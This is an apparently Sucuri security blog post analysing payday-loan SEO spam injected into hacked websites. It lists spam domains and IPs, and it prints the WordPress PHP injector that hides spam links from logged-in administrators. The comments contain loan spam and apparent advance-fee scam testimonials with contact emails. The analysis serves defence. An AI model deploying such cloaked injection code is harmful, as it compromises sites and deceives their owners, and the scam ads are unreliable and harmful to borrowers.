Payday Loan Spam affecting Thousands of Sites

One of the most important metrics used by search engines to rank a site is the number of link backs that it has. The more links a site has for a specific keyword, the higher it will rank when someone searches for it. So if a site has a lot of links back for a keyword (say “loan”), if someone searches for “loan” it will rank very high.

That’s where SPAM SEO (Search Engine Optimization) comes int play. Instead of building content and growing a site to organically receive links back, criminals (yes, anyone that hacks someone’s else site for monetary gain is a criminal) will hack into websites and inject links that will target specific keywords.

Those links will then point to a website controlled by the attacker[s] that they want to have better ranking. Very often those links are conditional (only displayed for search engine bots) and hard to detect without a specialized scanning tool.

Payday Loan Spam

We see all types of SPAM, the most common used to be about pharma products (like Viagra  or Cialis), Cassinos online and pornographic pages. Lately, however, we have started to see a sharp increase in the number of sites injected with payday loan and money borrowing services.

The SPAM in it of itself once displayed is very simple, all it does is add a hidden link to a site to offer loans. Similar to:

<a href="httx://payday-all.co.uk/” title="Pay Day Loans Uk”>pay day loans uk</a>

When Google (or Bing) visits the compromised site it will see the link to payday-all.co.uk and increase the PR (page rank) for payday-all.co.uk. As more sites get infected and linking to payday-all, the better it will rank for keywords like “UK Pay day loan”.

Note that this type of spam is not new and we first blogged about it last year: Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla, explaining how they were being hidden inside WordPress sites.

Over the past year, this campaign continues to grow and evolve and their techniques have also matured.

Payday Loan Spam – The domains

Most of the payday spam we are tracking seems to end in one of the following domains (by a company called Cash Advance Online or Pay Day Online):

http://paydayloansyouknow.com.au/ (216.172.52.62)
http://paydayloanstores88paycheck.com/ (216.172.52.62)
http://quickcashnowgjyourself.com/ (216.172.52.64)
http://getin10minpaydayloans.com/ (216.172.52.64)
http://cheappaydayadvancevcadvanc.com (216.172.52.64)
http://cashadvancelocationsndbusiness.com (216.172.52.64)
http://findcashadvancefor.me/ (216.172.52.63)
http://findcashadvancenow4.me/ (216.172.52.64)
http://paydayloanlendersxocomprehensive.com/ (216.172.52.60)
http://personalcashloans64long.com/ (216.172.52.67)
http://loanstillpaydayncwith.com (216.172.52.67)
http://kopainstallmentpaydayloansonline.com (216.172.52.67)
http://ukropinstantloans.com (64.191.79.185)
http://pincashadvance.com (64.191.79.185)
http://perapaydayloansonline.com (64.191.79.185)
http://kopainstallmentpaydayloansonline.com/ (64.191.79.185)
http://loronlinepersonalloans.com/ (50.115.172.170)
http://inapersonalloans.com/ (50.115.172.24)
http://paydayloans10dokp.com/ (109.206.176.120)
http://paydayloans10tilp.com/ (173.214.248.102)
http://paydayloans10ukhw.com/ (173.214.248.100)
http://paydayloansthis.com/ (109.206.176.19)
http://www.payday-hawk.co.uk/ (184.173.197.237)
http://paydayloansfromnowon.com/ (109.206.176.11)
http://cash-loans247.co.uk/ (37.1.209.107)
http://payday-all.co.uk/ (37.1.209.107)

Here are some quick stats on the IPs above:

109.206.176.11	1
109.206.176.120	1
109.206.176.19	1
173.214.248.100	1
173.214.248.102	1
184.173.197.237	1
216.172.52.60	1
216.172.52.62	2
216.172.52.63	1
216.172.52.64	5
216.172.52.67	3
37.1.209.107	2
50.115.172.170	1
50.115.172.24	1
64.191.79.185	4

and

109.206.176	3
173.214.248	2
184.173.197	1
216.172.52	12
37.1.209	2
50.115.172	2
64.191.79	4

Their templates all look the same, they try to convince the user to sign up and register with them to be pre-approved for a loan. This is the common landing page for Cash Advance Online:

Cash spam

And this is the template for Pay Day Online:

Spam cache 2

As you can see, a good and clean designed page trying to convince the user to sign up. What’s scary is the number of sites linked to them. If you do some searches on Google for the specific keywords they use:

“payday loans massachusetts” OR
“payday loan bad credit” OR
“business cash advance loans” OR
“No Fax Payday Loan”

You will find hundreds of thousands of pages linking to them. All from unrelated sites ranging from personal blogs, government sites, forums and universities.

Applying for a loan

After seeing so many sites with this spam, I felt compelled to see if can get a loan. So, I decided to try a few of them to see what would happened.

First, I filled the form that asked for a lot of personal information (Name, Address, email, Social security number, Bank information, etc). All of them denied me and redirected me to altohost.com, which in turn redirected me again to lenditfinancial.com.

http://getin10minpaydayloans.com/apply ->
https://altohost.com/system/thank.you.page/click.php?id=2610 ->

https://www.lenditfinancial.com/newcode/step2.php?referid=T3

Altohost is part of t3leads.com (affiliate marketing/tracking), so it seems the attackers are building this network of spam sites to redirect users to legitimate payment companies that offer affiliate commission (lendit Financial). Always about the money.

Payday Loan Spam – The hiding spot

As we said before, most of the spam is conditional, so a normal user visiting the site won’t see them. Only search engines (like Google or Bing) will see the malicious links added there. In addition to being conditional, the spam is also hidden via javascript. So if you are using a browser with javascript enabled, the spam will not show up.

This is the javascript used to hide the spam (that is also flagged by sitecheck):

SPAM seo push

And the attackers to do not stop there. On a WordPress site, they add the following piece of code (or similar) to inject the spam:

function b_call($b) {
if (!function_exists(“is_user_logged_in”) || is_user_logged_in() || !($m = get_option(“_metaproperty”))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace(“~<body[^>]*>~”, ‘\\0′.”\n”. $n .”\n”, $b);
$b = str_ireplace(“</head>”, $m.”\n</head>”, $b);
return $b;
}
function b_start() {
ob_start(“b_call”);
}
function b_end() {
ob_end_flush();
}
add_action(“wp_head”, “b_start”);
add_action(“wp_footer”, “b_end”);

Which will hide the code from anyone that is logged in (administrators of the site) and only display to the others. The spam content is also hidden inside the _metaproperty option inside the wp_options table.

The code changes at each new cycle of the spam, but the idea is the same. Make it harder for the owner of the site to detect and at the same time display the spam links to search engine bots.

Who is behind

It is very hard to point a specific organization or person responsible for those spam injections. The whois from all the domains is hidden and they seem to use quite a range of IP addresses. From our tests, they are pointing to affiliate links to try to make commission money from legitimate companies. So the only real way to track them is going after the legitimate lending companies and track who they are paying the money to.

Scan your website for free:
About Daniel Cid

Sucuri CTO, OSSEC Founder, open source developer and information security professional - dcid.me

  • http://www.georgiecasey.com/ Georgie Casey

    That javascript that displays the hidden link (http://blog.sucuri.net/wp-content/uploads/2013/02/Screen-Shot-2013-02-17-at-12.59.58-PM.png), are you sure that’s just not Google Analytics? Sure looks like it anyway.

  • sagscout

    Hi,

    I have found this a block of html code on my WP site that is related to the article above and contains this site’s link: “ukropinstantloans.com”. Since I don’t know much HTML I am a little concerned about breaking my site by removing too much or too little. Does anyone know a method to remove the spam text?

    The symptom I am seeing only appears to happen on mobile devices and I am seeing the spam text mixed in with my site text on iPhones/iPads. I don’t see any sign of the spam text on my Mac or Windows PC even when not logged in as an admin…

    I would appreciate any ideas. Thanks.

  • http://www.allcreditlenders.net/ Mark barlett

    that’s true that so many payday loans spam affecting thousands of sites because in link back from unrelated spots and duplicate content and marketing ..

  • StockTrader

    Hey great article. They hacked my site bad. I deleted the malware from my header and one other area, don’t know which one (go daddy helped me over the phone and I went through my Go daddy dashboard). However, the malware is still popping up everywhere.. Any advice on where I could go next to delete this stuff?

  • StockTrader

    By the way the site is http://wallstreetstocksolutions.com Thanks!

  • daniel p

    I got hacked by this, and I wanted to say 2 things.

    1. is that if you have a WP blog on a server with other WP blogs, this will infect them all and you need to do a deep cleaning. It killed a number of my sites, and seems to attack the databases as well, slowing or breaking everything. Removing header infection alone doesn’t fix it.

    2. In no way do I work for securi, but I can’t speak highly enough of what they did for me. I was hacked, they took days of multiple devs to clean it, and carefully responded back and forth re-linking my databases and working with me directly to resolve and clean my site. I am writing this because there is really no other place for me to say thanks. Also to say that for me it was worth the money.

  • http://www.fastpaydaycashadvanceloans.com/ Warren Stephen

    True. Many of the fake payday loans Companies are totally spam… Be Aware to these companies

  • Easy fast payday loan

    Very nice post its really useful for all borrowers, and here
    no need to pay nay other charges for service charges or other taxes.

  • Guaranteed Car Finance

    Well all types of such posts help allot in reducing the spammers to low the risk of hacking. Car loans are now a days going ahead because of tough competitions.

  • http://paydayloanusa.net/ caracully

    What will it take for somebody to get a quick and productive access to credits?

  • tinn

    Ask

    Keyword.

    Payday Loans.

    You tell me.

  • http://billcollectorshateme.blogspot.com/ Bill Collectors Hate Me

    My blogger blog was hacked early on but I was able to get back in and gain control over it again and add stronger security measures to protect it. I was very lucky and thankful that the damage was minimal. Payday loans from what I hear, is a very popular keyword.

  • Robbie King

    I work for a company called Netregistry and I see this stuff all the time If you guys need some help in cleaning your sites In Australia you can call me on (02) 9934 0502 Ask for me Robbie King

    • Guest

      Ask for me Robbie King

  • Pingback: The Story of Clip:rect – A Black Hat SEO Trick | Sucuri Blog

  • juliet

    We offer our Loans to our clients In USD($), GBP(£) Euro(€) or ($) Singapore Dollars and in the following categories.

    Auto ,Mortgage ,Business ,Personal ,Real Estate Loan.

    Contact
    us today for easy loan with less stress. We give out loans at low and
    affordable interest rate… Why waste more time? Contact us ASAP so we
    can move on with your request.

    Contact us for more information with the Contact below,

    Loan Agent: Paul Chua

    Email: lim.koh56@yahoo.com

    Thank you for your response.

    Yours Faithfully,

    Mr. Lim Koh(C.E.O).

    LIM LOANS FIRM

  • Belen Drilon

    How my search for a real loan lender was actualized: I am Engr Belen Drilon by name, A born citizen of New Zealand, But due to my business i reside and i live in Canada. I have been here with my family for the past 25 years now for business. Before i really move on with my success story. I will want to first of all let everyone know that i am not joking with my story. Almost six months ago, I was in a critical search for a genuine loan lending company were i can obtain a loan of $120,000.00 Dollars, On this search i was not lucky to contact this reliable and dedicated loan firm that has taken helping those in need of loan there sole responsibility without failing them. During my search i contact four loan lenders online that promised me loan but at the end of it all i was aware they were fraudsters and complete scammers from Nigeria that were reported to the FBI by me when i found out that they out online to rip were they did not sow. But before i could realize this, I have lost over $17,500.00 dollars to them. Anyway i am so happy now as i am smiling now, Because i finally meet with this reliable loan company called Nort Jeje loan Investment who finally granted me my desired loan amount of $120,000.00 for the period of 16 Years. To be honest with all that are in-search of a real and genuine loan company, I was in a very big doubt when i contact them online after reading through there advert were they said they offer loan to the world, Oh !! I will never forget on the 2/1/2014 which was in the afternoon my time when i was suffing through the internet when i came across the advert that was posted by them. I don’t really know what take my attention to that advert, Because i vowed to God that i will never contact any loan lender online again, That they are all con artist and rip off. But this day that i read through the advert of this loan firm know as Nort Jeje loan Investment, A spirits inside of me direct me to contact them and when i did, I told them all i have been through online trying to get loan and they personally sympathize with me and said to me that i should be lucky and thank God for directing me to them finally, As they are giving me a 100% assurance that after this loan process has been done, That i will get my loan show up on my banking information’s that i sent to them during the period of processing my loan amount. I am so happy and i don’t even know what to say about this dynamic loan firm anymore that i came in-contact with that grant me my loan amount without any trace of scam activities. I am so sure that if this advert that i am dropping on this website is seen by the board of directors of this loan firm they will be impressed as i promised to testify of there goodness if they can grant my huge dream loan amount that has taken my business to the next level now. To all you loan seekers out there that need loan to speed up his / her business, settle long period accumulated bills / debts and to be financially stable, i urge you all today and now to stop searching as i and my wife is telling you all in the name of God for those that are Christians like us and to the Muslims, we are telling you all in the name of Allah if i am right, not to fall a victim to those scammers / rip off artist out there online, As be wise to kindly send your loan application to Nort Jeje loan Investment as you are not going to regret doing this at all. The kind of loans they grant to customers are as follows: Personal Loan, Business Start-up or Expansion, Education, Debt Consolidation, Hard Money Loans, etc. Save yourself from the scam loan lenders online and send your loan application to : nortjeje@hotmail.com for your loan amount..